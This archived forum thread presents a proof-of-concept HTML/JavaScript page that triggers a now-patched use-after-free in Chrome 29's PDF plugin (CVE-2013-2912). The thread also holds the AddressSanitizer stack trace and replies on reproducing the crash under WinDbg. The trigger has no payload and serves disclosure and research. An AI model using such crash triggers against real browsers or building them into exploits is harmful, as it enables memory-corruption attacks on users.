PDA

View Full Version : Chrome 29.0.1547.57 NotifyInstanceWasDeleted Use After Free PoC



41.w4r10r
10-17-2013, 08:25 PM
Hi,

This is PoC affecting Chrome 29.0.1547.57 , Beta, Canary which got patched in last chrome update
reference : http://googlechromereleases.blogspot.in/2013/10/stable-channel-update.html
CVE-2013-2912

Use After free vulnerability was in ppapi::proxy::PluginResource::NotifyInstanceWasDel eted and triggers with ready state event and domcontentloaded event, this issue also happens because a ready state event can be fired when loaders are canceled within domcontentloaded event.



<html>
<body>
<object id=pdf-viewer src=filenotnecessary.pdf type="application/pdf"></object>
<script>

i = 0;
var pdf;
document.addEventListener('readystatechange', function() {

if (i == 1)
{

document.body.appendChild(pdf);
}
else
{

pdf = document.getElementById("pdf-viewer");
}
i++;
});

window.addEventListener('DOMContentLoaded', function() {

pdf.reload();
});
</script>
</body>
</html>

41.w4r10r
10-17-2013, 08:29 PM
Detailed Stack Trace:



heap-use-after-free on address 0x61300002ddc8 at pc 0x7f763f509092 bp 0x7fff190c5360 sp 0x7fff190c5358 READ of size 8 at 0x61300002ddc8 thread T0 (chrome)
#0 0x7f763f509091 in std::_Rb_tree<int, std::pair<int const, scoped_refptr<ppapi::proxy::PluginResourceCallbackBase> >, std::_Select1st<std::pair<int const, scoped_refptr<ppapi::proxy::PluginResourceCallbackBase> > >, std::less<int>, std::allocator<std::pair<int const, scoped_refptr<ppapi::proxy::PluginResourceCallbackBase> > > >::_M_begin() /usr/lib/gcc/x86_64-linux-gnu/4.6/../../../../include/c++/4.6/bits/stl_tree.h:493
#1 0x7f763f52f32e in std::_Rb_tree<int, std::pair<int const, scoped_refptr<ppapi::proxy::PluginResourceCallbackBase> >, std::_Select1st<std::pair<int const, scoped_refptr<ppapi::proxy::PluginResourceCallbackBase> > >, std::less<int>, std::allocator<std::pair<int const, scoped_refptr<ppapi::proxy::PluginResourceCallbackBase> > > >::clear() /usr/lib/gcc/x86_64-linux-gnu/4.6/../../../../include/c++/4.6/bits/stl_tree.h:809
#2 0x7f763d879420 in ppapi::ResourceTracker::DidDeleteInstance(int) out/Release/../../ppapi/shared_impl/resource_tracker.cc:160
#3 0x7f763e84e9c3 in content::HostGlobals::InstanceDeleted(int) out/Release/../../content/renderer/pepper/host_globals.cc:257
#4 0x7f763e5cc562 in ~PepperPluginInstanceImpl out/Release/../../content/renderer/pepper/pepper_plugin_instance_impl.cc:563
#5 0x7f763e5cc17d in ~PepperPluginInstanceImpl out/Release/../../content/renderer/pepper/pepper_plugin_instance_impl.cc:524
#6 0x7f763e8b36a7 in scoped_refptr<content::PepperPluginInstanceImpl>::operator=(content::PepperPluginInstanceImpl*) out/Release/../../base/memory/ref_counted.h:267
#7 0x7f763e8b3887 in content::PepperWebPluginImpl::destroy() out/Release/../../content/renderer/pepper/pepper_webplugin_impl.cc:126
#8 0x7f763fbfa03e in ~WebPluginContainerImpl out/Release/../../third_party/WebKit/Source/web/WebPluginContainerImpl.cpp:648
#9 0x7f763fbf9edd in ~WebPluginContainerImpl out/Release/../../third_party/WebKit/Source/web/WebPluginContainerImpl.cpp:642
#10 0x7f764236e0e3 in WTF::HashTable<WTF::RefPtr<WebCore::Widget>, WTF::KeyValuePair<WTF::RefPtr<WebCore::Widget>, WebCore::FrameView*>, WTF::KeyValuePairKeyExtractor<WTF::KeyValuePair<WTF::RefPtr<WebCore::Widget>, WebCore::FrameView*> >, WTF::PtrHash<WTF::RefPtr<WebCore::Widget> >, WTF::KeyValuePairHashTraits<WTF::HashTraits<WTF::RefPtr<WebCore::Widget> >, WTF::HashTraits<WebCore::FrameView*> >, WTF::HashTraits<WTF::RefPtr<WebCore::Widget> > >::deallocateTable(WTF::KeyValuePair<WTF::RefPtr<WebCore::Widget>, WebCore::FrameView*>*, int) out/Release/../../third_party/WebKit/Source/wtf/HashTable.h:876
#11 0x7f7642367499 in WebCore::WidgetHierarchyUpdatesSuspensionScope::mo veWidgets() out/Release/../../third_party/WebKit/Source/core/rendering/RenderWidget.cpp:69
#12 0x7f76416b7da9 in ~WidgetHierarchyUpdatesSuspensionScope out/Release/../../third_party/WebKit/Source/core/rendering/RenderWidget.h:40
#13 0x7f76416b2c2d in WebCore::ContainerNode::removeChild(WebCore::Node* , WebCore::ExceptionState&) out/Release/../../third_party/WebKit/Source/core/dom/ContainerNode.cpp:498
#14 0x7f76416b14a0 in WebCore::collectChildrenAndRemoveFromOldParent(Web Core::Node*, WTF::Vector<WTF::RefPtr<WebCore::Node>, 11ul>&, WebCore::ExceptionState&) out/Release/../../third_party/WebKit/Source/core/dom/ContainerNode.cpp:70
#15 0x7f76416b1139 in WebCore::ContainerNode::appendChild(WTF::PassRefPt r<WebCore::Node>, WebCore::ExceptionState&, WebCore::AttachBehavior) out/Release/../../third_party/WebKit/Source/core/dom/ContainerNode.cpp:609
#16 0x7f7641798fda in WebCore::Node::appendChild(WTF::PassRefPtr<WebCore::Node>, WebCore::ExceptionState&, WebCore::AttachBehavior) out/Release/../../third_party/WebKit/Source/core/dom/Node.cpp:543
#17 0x7f7641e419c8 in WebCore::V8Node::appendChildMethodCustom(v8::Funct ionCallbackInfo<v8::Value> const&) out/Release/../../third_party/WebKit/Source/bindings/v8/custom/V8NodeCustom.cpp:120
#18 0x7f7641d1773c in WebCore::NodeV8Internal::appendChildMethodCallback ForMainWorld(v8::FunctionCallbackInfo<v8::Value> const&) out/Release/gen/blink/bindings/V8Node.cpp:703
#19 0x7f763ebe2b77 in v8::internal::FunctionCallbackArguments::Call(v8:: Handle<v8::Value> (*)(v8::Arguments const&)) out/Release/../../v8/src/arguments.cc:103
addr2line: '': No such file
#20 0x7f763ec07425 in v8::internal::MaybeObject* v8::internal::HandleApiCallHelper<false>(v8::internal::(anonymous namespace)::BuiltinArguments<(v8::internal::BuiltinExtraArguments)1>, v8::internal::Isolate*) out/Release/../../v8/src/builtins.cc:1272
#21 0x7f763ebfaf84 in v8::internal::Builtin_HandleApiCall(int, v8::internal::Object**, v8::internal::Isolate*) out/Release/../../v8/src/builtins.cc:1288
#22 0x1a7a88f072ad in
0x61300002ddc8 is located 72 bytes inside of 384-byte region [0x61300002dd80,0x61300002df00)
freed by thread T0 (chrome) here:
#0 0x7f763b0e9e95 in operator delete _asan_rtl_
#1 0x7f763d876f9a in ppapi::Resource::NotifyInstanceWasDeleted() out/Release/../../ppapi/shared_impl/resource.cc:70
#2 0x7f763f52e36d in ppapi::proxy::PluginResource::NotifyInstanceWasDel eted() out/Release/../../ppapi/proxy/plugin_resource.cc:62
#3 0x7f763d879420 in ppapi::ResourceTracker::DidDeleteInstance(int) out/Release/../../ppapi/shared_impl/resource_tracker.cc:160
#4 0x7f763e84e9c3 in content::HostGlobals::InstanceDeleted(int) out/Release/../../content/renderer/pepper/host_globals.cc:257
#5 0x7f763e5cc562 in ~PepperPluginInstanceImpl out/Release/../../content/renderer/pepper/pepper_plugin_instance_impl.cc:563
#6 0x7f763e5cc17d in ~PepperPluginInstanceImpl out/Release/../../content/renderer/pepper/pepper_plugin_instance_impl.cc:524
#7 0x7f763e8b36a7 in scoped_refptr<content::PepperPluginInstanceImpl>::operator=(content::PepperPluginInstanceImpl*) out/Release/../../base/memory/ref_counted.h:267
#8 0x7f763e8b3887 in content::PepperWebPluginImpl::destroy() out/Release/../../content/renderer/pepper/pepper_webplugin_impl.cc:126
#9 0x7f763fbfa03e in ~WebPluginContainerImpl out/Release/../../third_party/WebKit/Source/web/WebPluginContainerImpl.cpp:648
#10 0x7f763fbf9edd in ~WebPluginContainerImpl out/Release/../../third_party/WebKit/Source/web/WebPluginContainerImpl.cpp:642
#11 0x7f764236e0e3 in WTF::HashTable<WTF::RefPtr<WebCore::Widget>, WTF::KeyValuePair<WTF::RefPtr<WebCore::Widget>, WebCore::FrameView*>, WTF::KeyValuePairKeyExtractor<WTF::KeyValuePair<WTF::RefPtr<WebCore::Widget>, WebCore::FrameView*> >, WTF::PtrHash<WTF::RefPtr<WebCore::Widget> >, WTF::KeyValuePairHashTraits<WTF::HashTraits<WTF::RefPtr<WebCore::Widget> >, WTF::HashTraits<WebCore::FrameView*> >, WTF::HashTraits<WTF::RefPtr<WebCore::Widget> > >::deallocateTable(WTF::KeyValuePair<WTF::RefPtr<WebCore::Widget>, WebCore::FrameView*>*, int) out/Release/../../third_party/WebKit/Source/wtf/HashTable.h:876
#12 0x7f7642367499 in WebCore::WidgetHierarchyUpdatesSuspensionScope::mo veWidgets() out/Release/../../third_party/WebKit/Source/core/rendering/RenderWidget.cpp:69
#13 0x7f76416b7da9 in ~WidgetHierarchyUpdatesSuspensionScope out/Release/../../third_party/WebKit/Source/core/rendering/RenderWidget.h:40
#14 0x7f76416b2c2d in WebCore::ContainerNode::removeChild(WebCore::Node* , WebCore::ExceptionState&) out/Release/../../third_party/WebKit/Source/core/dom/ContainerNode.cpp:498
#15 0x7f76416b14a0 in WebCore::collectChildrenAndRemoveFromOldParent(Web Core::Node*, WTF::Vector<WTF::RefPtr<WebCore::Node>, 11ul>&, WebCore::ExceptionState&) out/Release/../../third_party/WebKit/Source/core/dom/ContainerNode.cpp:70
#16 0x7f76416b1139 in WebCore::ContainerNode::appendChild(WTF::PassRefPt r<WebCore::Node>, WebCore::ExceptionState&, WebCore::AttachBehavior) out/Release/../../third_party/WebKit/Source/core/dom/ContainerNode.cpp:609
#17 0x7f7641798fda in WebCore::Node::appendChild(WTF::PassRefPtr<WebCore::Node>, WebCore::ExceptionState&, WebCore::AttachBehavior) out/Release/../../third_party/WebKit/Source/core/dom/Node.cpp:543
#18 0x7f7641e419c8 in WebCore::V8Node::appendChildMethodCustom(v8::Funct ionCallbackInfo<v8::Value> const&) out/Release/../../third_party/WebKit/Source/bindings/v8/custom/V8NodeCustom.cpp:120
#19 0x7f7641d1773c in WebCore::NodeV8Internal::appendChildMethodCallback ForMainWorld(v8::FunctionCallbackInfo<v8::Value> const&) out/Release/gen/blink/bindings/V8Node.cpp:703
#20 0x7f763ebe2b77 in v8::internal::FunctionCallbackArguments::Call(v8:: Handle<v8::Value> (*)(v8::Arguments const&)) out/Release/../../v8/src/arguments.cc:103
#21 0x7f763ec07425 in v8::internal::MaybeObject* v8::internal::HandleApiCallHelper<false>(v8::internal::(anonymous namespace)::BuiltinArguments<(v8::internal::BuiltinExtraArguments)1>, v8::internal::Isolate*) out/Release/../../v8/src/builtins.cc:1272
#22 0x7f763ebfaf84 in v8::internal::Builtin_HandleApiCall(int, v8::internal::Object**, v8::internal::Isolate*) out/Release/../../v8/src/builtins.cc:1288
#23 0x1a7a88f072ad in
#24 0x1a7a88f63a2e in
#25 0x1a7a88f108b3 in
#26 0x1a7a88f2acfd in
#27 0x1a7a88f17e16 in
#28 0x7f763ec77dd2 in v8::internal::Invoke(bool, v8::internal::Handle<v8::internal::JSFunction>, v8::internal::Handle<v8::internal::Object>, int, v8::internal::Handle<v8::internal::Object>*, bool*) out/Release/../../v8/src/execution.cc:119
#29 0x7f763ebb9e78 in v8::Function::Call(v8::Handle<v8::Object>, int, v8::Handle<v8::Value>*) out/Release/../../v8/src/api.cc:4387
previously allocated by thread T0 (chrome) here:


Keep hunting for bugs :D

1qaz2wsx
12-19-2013, 02:01 PM
hi~
i want to reappear this bug,can you tell me which debugger you use? and how to attach chrome?
i try to attach it use ollydbg or windbg but it not work
thanks

41.w4r10r
12-19-2013, 04:16 PM
i am using windbg for analyzing crashes.. for chrome or any other sandbox process debugging you need to tick check box when you are executing program under windbg.

eg: Start windbg -> press ctrl+e -> select program you want to debug (c:\program files\google\chrome\application\chrome.exe) -> Click on "debug child process also"(bottom of box) -> click open

above process will start chrome under windbg now load you poc into chrome and you can see crash under debugger now you start analyzing it ;)

1qaz2wsx
12-25-2013, 12:22 PM
Happy Christmas!:)
thanks for you reply~but i have another question
i use xp sp3+chrome+windbg and i get the crash at:chrome_1c30000!RelaunchChromeBrowserWithNewComm andLineIfNeeded++0x94e13e:
035395c9 807f1500 cmp byte ptr [edi+15h],0 ds:0023:fa60061b=??
i want to know how you identify the thread who has the flaw?
please give me some advise